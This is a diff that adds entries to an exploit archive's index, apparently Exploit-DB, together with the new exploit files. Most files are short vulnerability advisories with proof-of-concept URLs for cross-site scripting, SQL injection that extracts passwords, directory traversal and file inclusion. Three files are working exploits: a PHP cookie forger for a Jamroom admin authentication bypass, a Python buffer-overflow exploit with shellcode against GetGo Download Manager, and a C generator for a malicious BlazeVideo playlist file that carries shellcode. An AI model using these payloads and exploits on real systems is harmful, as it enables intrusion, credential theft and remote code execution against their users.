Updated 03_10_2014

files.csv

@@ -28836,6 +28836,7 @@ id,file,description,date,author,platform,type,port
 32052,platforms/windows/remote/32052.html,"Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download Vulnerability",2008-07-14,Symantec,windows,remote,0
 32053,platforms/php/webapps/32053.txt,"WordPress <= 2.5.1 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0
 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0
+32055,platforms/multiple/local/32055.txt,"Netrw Vim Script 's:BrowserMaps()' Command Execution Vulnerability",2008-07-16,"Jan Minar",multiple,local,0
 32056,platforms/windows/dos/32056.py,"BitComet 1.02 URI Handling Remote Denial of Service Vulnerability",2008-07-16,Shinnok,windows,dos,0
 32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities",2008-07-16,ahmadbady,php,webapps,0
 32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 'search_wA.php' Remote File Include Vulnerability",2008-07-16,"Ghost Hacker",php,webapps,0
@@ -28882,6 +28883,7 @@ id,file,description,date,author,platform,type,port
 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 'aa_login' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
 32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0
+32104,platforms/multiple/dos/32104.txt,"ZDaemon 1.8 - NULL Pointer Remote Denial of Service Vulnerability",2008-07-21,"Luigi Auriemma",multiple,dos,0
 32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 '.m3u' and '.pls' File Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0
 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 learnPath/calendar/myagenda.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 user/user.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
@@ -28892,4 +28894,21 @@ id,file,description,date,author,platform,type,port
 32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a Psuedo Terminal Denial of Service Vulnerability",2008-07-23,kokanin,linux,dos,0
 32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 'username' Parameter SQL Injection Vulnerability",2008-07-23,"Lars Heidelberg",php,webapps,0
 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 'atomPhotoBlog.php' SQL Injection Vulnerability",2008-07-24,Mr.SQL,php,webapps,0
+32115,platforms/php/webapps/32115.txt,"Ajax File Manager Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0
 32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Include Vulnerability",2008-07-25,"HACKERS PAL",php,webapps,0
+32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 SQL Injection Vulnerability",2008-07-26,dun,php,webapps,0
+32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum 'category.php' SQL Injection Vulnerability",2008-07-27,"Hussin X",php,webapps,0
+32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 admin_group_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0
+32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 admin_category_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0
+32121,platforms/php/webapps/32121.php,"Jamroom <= 3.3.8 Cookie Authentication Bypass Vulnerability and Multiple Unspecified Security Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0
+32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 'register.php' Cross Site Scripting Vulnerability",2008-07-28,"Fabian Fingerle",php,webapps,0
+32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities",2008-07-29,"Ghost Hacker",php,webapps,0
+32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 ActiveX Control Remote Buffer Overflow Vulnerability",2008-07-29,"Edi Strosar",windows,remote,0
+32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service Vulnerability",2008-07-30,"Luigi Auriemma",multiple,dos,0
+32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x 'System Log' Page HTML Injection Vulnerability",2008-05-11,Portcullis,php,webapps,0
+32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service And Memory Corruption Vulnerabilities",2008-07-30,"Luigi Auriemma",multiple,dos,0
+32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 'guestbook.js.php' Cross Site Scripting Vulnerability",2008-07-30,DSecRG,php,webapps,0
+32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0
+32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
+32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
+32132,platforms/windows/local/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,local,0

platforms/asp/webapps/32119.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30398/info
+
+Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Web Wiz Forums 9.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin_group_details.asp?mode=%3C/textarea%3E'%22%3E%3Cscript%3Ealert('document.cookie')%3C/script%3E

platforms/asp/webapps/32120.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30398/info
+ 
+Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Web Wiz Forums 9.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin_category_details.asp?mode=%3C/textarea%3E'%22%3E%3Cscript%3Ealert('document.cookie')%3C/script%3E

platforms/multiple/dos/32104.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30340/info
+
+ZDaemon is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions.
+
+An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects ZDaemon 1.08.07 and earlier versions.
+
+http://www.exploit-db.com/sploits/32104.zip

platforms/multiple/dos/32125.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30427/info
+
+Unreal Tournament 2004 is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions.
+
+An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects Unreal Tournament 2004 v3369 and prior versions. 
+
+http://www.exploit-db.com/sploits/32125.zip

platforms/multiple/dos/32127.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/30430/info
+
+Unreal Tournament 3 is prone to multiple remote vulnerabilities, including a denial-of-service issue and a memory-corruption issue.
+
+An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the application to crash.
+
+These issues affect the following versions:
+
+Unreal Tournament 3 1.3beta4
+Unreal Tournament 3 1.2 and prior
+
+http://www.exploit-db.com/sploits/32127.zip

platforms/multiple/local/32055.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30254/info
+
+Netrw is prone to a command-execution vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting this issue can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
+
+Netrw 127 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/32055.zip

platforms/php/webapps/32115.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Ajax File Manager  DirectoryTraversal
+# Google Dork: inurl: "plugins/ajaxfilemanager"
+# Date: 03/07/2014
+# Exploit Author: Eduardo Alves (edudx9)
+# Vendor Homepage: phpletter.com
+# Software Link: http://phpletter.com/Demo/Ajax-File--Manager/
+# Version: [app version - All
+# Tested on: Windows/Linux
+
+
+Ajax File/Image Manager is a l tool  to manager files and images remotely.
+Without extra configs, it's possible to list files from another directory.
+
+The vulnerability it's related to "search" function"
+
+In "search_folder" parameter, escape with ../  or  ..%2f
+
+PoF:
+
+http://SERVER/PATH/ajaxfilemanager/ajax_get_file_listing.php?limit=10&view=thumbnail&search=1&search_name=&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=../../../../../../../../home/phungv93/public_html/

platforms/php/webapps/32117.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30384/info
+
+Willoughby TriO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions up to and including TriO 2.1 are vulnerable. 
+
+http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
+http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers-- 

platforms/php/webapps/32118.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30389/info
+
+GC Auction Platinum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin-- 

platforms/php/webapps/32121.php

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/30406/info
+
+Jamroom is prone to fourteen security vulnerabilities, including an authentication-bypass vulnerability that occurs because the application fails to verify user-supplied data.
+
+Very few technical details are available regarding the remaining security vulnerabilities. We will update this BID when more information is disclosed.
+
+An attacker can exploit the authentication-bypass vulnerability to gain administrative access to the affected application; other attacks are also possible. Effects of the remaining security vulnerabilities are not currently known. 
+
+<?php
+$data = array();
+$user = 'admin'; // Target
+
+$data[0] = base64_encode(serialize($user));
+$data[1] = (bool)0;
+echo "\n\n===[ 0 ] ========================\n\n";
+echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
+$data[1] = (bool)1;
+echo "\n\n===[ 1 ] ========================\n\n";
+echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
+?>

platforms/php/webapps/32122.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30410/info
+
+Owl Intranet Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Owl Intranet Engine 0.95 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/Owl/register.php?myaction=getpasswd&username="><script>alert(1);</script> 

platforms/php/webapps/32123.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/30421/info
+
+The RSS plugin for miniBB is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible. 
+
+http://www.example.com/rss2.php?premodDir=[EVIL]
+http://www.example.com/rss2.php?pathToFiles=[EVIL] 

platforms/php/webapps/32126.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30429/info
+
+
+ScrewTurn Wiki is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+The issue affects ScrewTurn Wiki 2.0.29 and 2.0.30; other versions may also be affected. 
+
+The following example URI is available:
+http://www.example.com/?[script]alert('XSS')[/script] 

platforms/php/webapps/32128.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30438/info
+
+MJGUEST is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MJGUEST 6.8 GT is vulnerable; other versions may also be affected.
+
+http://www.example.com/guestbook.js.php?link=[XSS] 

platforms/php/webapps/32130.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30447/info
+
+DEV Web Management System is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include local file-include, SQL-injection, and cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to view sensitive information, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DEV Web Management System 1.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/?session=">><>><script>alert(document.cookie)</script> <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/index.php?session=0&action=search" method="POST" name="form"> <form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/> <input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>"> </form> </body> </html> http://www.example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] http://www.example.com/admin/index.php?start=install&step=file.type%00 

platforms/php/webapps/32131.txt

@@ -0,0 +1,36 @@
+# Exploit Title  : ClipSharePro <= 4.1 Local File Inclusion
+# Date           : 2013/3/9
+# Exploit Author : Saadat Ullah ? saadi_linux[at]rocketmail[dot]com
+# Software Link  : http://www.clip-share.com
+# Author HomePage: http://security-geeks.blogspot.com
+# Tested on: Server : Apache/2.2.15 PHP/5.3.3
+
+#Local File Inclusion
+
+ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through 
+which attacker can include arbitrary file in webapp.
+
+LFI in ubr_link_upload.php
+Poc code
+
+if($MULTI_CONFIGS_ENABLED){
+	if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
+	else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
+}
+else{ $config_file = $DEFAULT_CONFIG; }
+
+// Load config file
+require $config_file;  //including arbitrary file $_GET['config_file']
+echo $config_file;
+
+
+The vulnerability can be exploited as..
+http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd
+
+
+For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file..
+In ubr_ini.php
+
+$MULTI_CONFIGS_ENABLED       = 1; --->This value should have to be 1
+
+#Independent Pakistani Security Researcher

platforms/windows/local/32132.py

@@ -0,0 +1,68 @@
+#!/usr/bin/python
+# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
+# Version:       v4.9.0.1982
+# CVE:           CVE-2014-2206
+# Date:          2014-03-09
+# Author:        Julien Ahrens (@MrTuxracer)
+# Homepage:      http://www.rcesecurity.com
+# Software Link: http://www.getgosoft.com
+# Tested on:     WinXP SP3-GER 
+#
+# Howto / Notes:
+# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
+#
+
+from socket import *
+from time import sleep
+from struct import pack
+ 
+host = "192.168.0.1"
+port = 80
+ 
+s = socket(AF_INET, SOCK_STREAM)
+s.bind((host, port))
+s.listen(1)
+print "\n[+] Listening on %d ..." % port
+ 
+cl, addr = s.accept()
+print "[+] Connection accepted from %s" % addr[0]
+ 
+junk0 = "\x90" * 4107
+nseh = "\x90\x90\xEB\x06"
+seh=pack('<L',0x00280b0b)  # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
+nops = "\x90" * 50
+
+# windows/exec CMD=calc.exe 
+# Encoder: x86/shikata_ga_nai
+# powered by Metasploit 
+# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
+
+shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
+"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
+"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
+"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
+"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
+"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
+"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
+"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
+"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
+"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
+"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
+"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
+"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
+"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
+"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
+"\xa5\x59\x50")
+
+payload = junk0 + nseh + seh + nops + shellcode
+
+buffer = "HTTP/1.1 200 "+payload+"\r\n"
+ 
+print cl.recv(1000)
+cl.send(buffer)
+print "[+] Sending buffer: OK\n"
+
+sleep(3)
+cl.close()
+s.close()

platforms/windows/remote/32124.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30424/info
+
+The 'CoVideoWindow.ocx' ActiveX control of Eyeball MessengerSDK is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+This issue affects 'CoVideoWindow.ocx' 5.0.907.1; other versions may also be affected.
+
+<html> <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object> <input language=VBScript onclick=buffero() type=button value="Crash"> <script language = 'vbscript'> Sub buffero() crash = String(515000, unescape("%41")) test.BgColor = crash End Sub </script> </html> 

platforms/windows/remote/32129.cpp

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/30442/info
+
+BlazeVideo HDTV Player is prone to a stack-based buffer-overflow vulnerability because the application fails to handle malformed playlist files.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the application or to trigger a denial-of-service condition.
+
+BlazeVideo HDTV Player 3.5 is vulnerable; other versions may also be affected.
+
+/*Blaze Video HDTV Player V 3.5 .PLF File Stack Buffer Overflow Exploit
+  This sploit will create a special plf file,when you open this file
+  calc.exe will be launched.Tested on Win XP Pro Sp3,if you run it on 
+  another platform ,make sure you modify the retaddress in the sploit.
+ Disclaimer
+ This program was written for educational purpose. Use it at your own risk.Author 
+ will be not be responsible for any damage.
+ Credits for finging the bug and sploit go to fl0 fl0w. 
+ Greetz to all romanian coderz !! 
+ Contact me at flo_flow_supremacy@yahoo.com
+ Have fun !
+*/
+#include<stdio.h>
+#include<string.h>
+#include<windows.h>
+#include<stdlib.h>
+
+#define EVILFILE "Romanian.plf"
+#define FIRST "C:\\"
+#define OFFSET 257
+
+char shellcode[]=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
+"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
+"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
+"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
+"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
+"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
+"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
+"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
+"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
+"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
+"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
+"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
+"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
+"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
+"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
+"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
+"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
+"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
+"\x70\x63";
+
+
+  int main()
+ { FILE *p;
+   unsigned char *buffer;
+   unsigned int offset=0;
+   unsigned int retaddress=0x7C8369F0;
+   buffer=(unsigned char *)malloc(OFFSET+strlen(shellcode)+4+20+1);
+   if((p=fopen(EVILFILE,"wb"))==NULL)
+   { printf("error"); exit(0); } 
+     
+   memset(buffer,0x90,OFFSET+strlen(shellcode)+4+1);  
+   offset=OFFSET;
+   memcpy(buffer+offset,&retaddress,4);
+   offset+=4+20;
+   memcpy(buffer+offset,shellcode,strlen(shellcode));
+   offset+=strlen(shellcode);
+   memset(buffer+offset,0x00,1);
+   fprintf(p,"%s%s",FIRST,buffer);
+   printf("|--------------------------------------------------------------------------|\n");
+   printf("Blaze Video HDTV Player V 3.5 .PLF File Stack Buffer Overflow Exploit\n");
+   printf("Credits for finging the bug and sploit go to fl0 fl0w\n");
+   printf(".PLF file done.. open with Blaze Player and have fun! \n" );
+   printf("|--------------------------------------------------------------------------|\n");
+   fclose(p);
+   free(buffer);
+  return 0; 
+ }